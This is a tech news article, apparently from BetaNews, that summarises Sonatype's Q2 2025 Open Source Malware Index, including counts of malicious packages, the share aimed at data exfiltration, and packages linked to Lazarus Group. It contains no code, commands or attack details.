Open-source malware targets data exfiltration

No Comments

Supply chain security company Sonatype has released the Q2 2025 edition of its Open Source Malware Index, uncovering 16,279 malicious open source packages across major ecosystem.

This brings the total number of open-source malware packages Sonatype has discovered to 845,204. Compared to the end of the same quarter last year, the total volume of malware logged by Sonatype has surged 188 percent, underscoring the growing sophistication and scale of attacks aimed at developers, software teams, and CI/CD pipelines.

"Attackers are no longer simply experimenting with open source. The numbers are telling us that threat actors have identified data as the most profitable target, and developers as the easiest way in," says Brian Fox, CTO and co-founder of Sonatype. “Developers and security teams must be vigilant, as threats increasingly hide in plain sight within everyday tools and dependencies.”

Data exfiltration remains the main motivation, accounting for 55 percent of all malicious packages discovered. In Q2 alone, more than 4,400 packages were specifically designed to steal sensitive data, including secrets, personally identifiable information (PII), passwords, access tokens, and API keys. These attacks increasingly target the critical intersection of developer tools and production environments, where a single leak can compromise entire systems.

There’s also been an increase in malware focused on data corruption, with these threats doubling in frequency to represent over three percent of all malicious packages -- more than 400 unique instances in Q2 2025. These packages aim to damage files, inject malicious code, or otherwise sabotage applications and infrastructure. By contrast cryptominers have declined, making up only five percent of packages in Q2.

The report shows that sophisticated threat groups are using open source to accomplish cyber espionage, financial cybercrime, and more. For example, Lazarus Group, an Advanced Persistent Threat (APT) associated with the North Korean government, has been associated with 107 packages discovered by Sonatype in Q2 2025 that collectively have more than 30,050 known downloads.

You can find out more on the Sonatype blog.

Image credit: solarseven/depositphotos.com

No Comments
Got News? Contact Us

Recent Headlines

Windows 11 Build 27898 introduces taskbar icon scaling and system recovery improvements

Supply chain issues pose major risks to financial organizations

Philips launches a 4K gaming monitor built for speed and clarity

This ergonomic AI mechanical keyboard is built for modern productivity

Over half of employees fall for mobile phishing scams

YouTube is dropping the Trending page as it shakes up content discovery

International collaboration aims to combat deepfakes and AI misuse

Most Commented Stories

Betanews Is Growing Alongside You

37 Comments

Windows 11 25H2 has a new option to remove all unwanted Microsoft apps

34 Comments

16 Billion Passwords Exposed: Major Leak Hits Apple, Facebook and Google Users 

16 Comments

Will Windows 10 stop working? See if your PC will survive the switch to Windows 11

9 Comments

Half of Americans think AI is a threat, the other half don't. Who's right?

6 Comments

Apple’s Liquid Glass Control Center Gets a Much-Needed Fix in iOS 26 Beta 2

6 Comments

Apple’s CarPlay Ultra Comes to a Halt as Industry Giants Start Changing Their Minds

6 Comments

Never mind Windows 11, Windows Classic Remastered is the nostalgic Microsoft operating system you didn't know you wanted

6 Comments

© 1998-2025 BetaNews, Inc. All Rights Reserved. About Us - Privacy Policy - Cookie Policy - Sitemap.